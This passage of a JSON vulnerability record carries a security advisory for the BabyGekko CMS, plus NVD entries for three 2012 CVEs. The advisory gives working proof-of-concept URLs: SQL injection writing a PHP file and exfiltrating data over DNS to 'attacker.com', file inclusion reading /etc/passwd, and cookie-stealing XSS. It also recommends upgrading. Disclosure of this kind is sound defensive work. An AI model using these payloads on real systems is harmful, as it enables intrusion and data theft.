A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the \"app\" parameter to \"index.php\". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the \"/etc/passwd\" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of \"/tmp/.class.php\" file created during exploitation of vulnerabilities 1.1 or 1.2. 
Depending on server configuration and permissions it will show the results of \"phpinfo()\" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the \"id\" parameter to \"/admin/index.php\" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the \"username\" and \"password\" HTTP POST parameters to the \"index.php\" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires \"loginbox\" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"username\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"hidden\" name=\"password\" value='\"><script>alert(document.cookie);</script>' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in 
BabyGekko.\r\n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "sourceHref": "https://www.exploit-db.com/download/22741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:23:22", "description": "BabyGekko before 1.2.4 has SQL injection.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-23T15:15:00", "type": "cve", "title": "CVE-2012-5698", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5698"], "modified": "2020-01-29T20:18:00", "cpe": [], "id": "CVE-2012-5698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5698", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:28", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko before 1.2.2f allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/index.php or the (2) username or (3) password parameter in blocks/loginbox/loginbox.template.php to index.php. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2014-09-22T15:55:00", "type": "cve", "title": "CVE-2012-5700", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5700"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:babygekko:baby_gekko:0.98", "cpe:/a:babygekko:baby_gekko:0.91", "cpe:/a:babygekko:baby_gekko:1.1.2", "cpe:/a:babygekko:baby_gekko:1.0.0", "cpe:/a:babygekko:baby_gekko:1.1.4", "cpe:/a:babygekko:baby_gekko:0.99", "cpe:/a:babygekko:baby_gekko:1.1.3", "cpe:/a:babygekko:baby_gekko:1.2.0", "cpe:/a:babygekko:baby_gekko:1.2.2", "cpe:/a:babygekko:baby_gekko:1.1.1", "cpe:/a:babygekko:baby_gekko:1.0.1", "cpe:/a:babygekko:baby_gekko:1.1.5", "cpe:/a:babygekko:baby_gekko:0.90", "cpe:/a:babygekko:baby_gekko:1.1.0"], "id": 
"CVE-2012-5700", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5700", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:babygekko:baby_gekko:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.99:beta:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:a:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.98:alpha:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:e:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.2:d:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:babygekko:baby_gekko:1.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:25", "description": "BabyGekko before 1.2.4 allows PHP file inclusion.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-23T15:15:00", "type": "cve", "title": "CVE-2012-5699", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5699"], "modified": "2020-01-29T20:19:00", "cpe": [], "id": "CVE-2012-5699", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5699", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}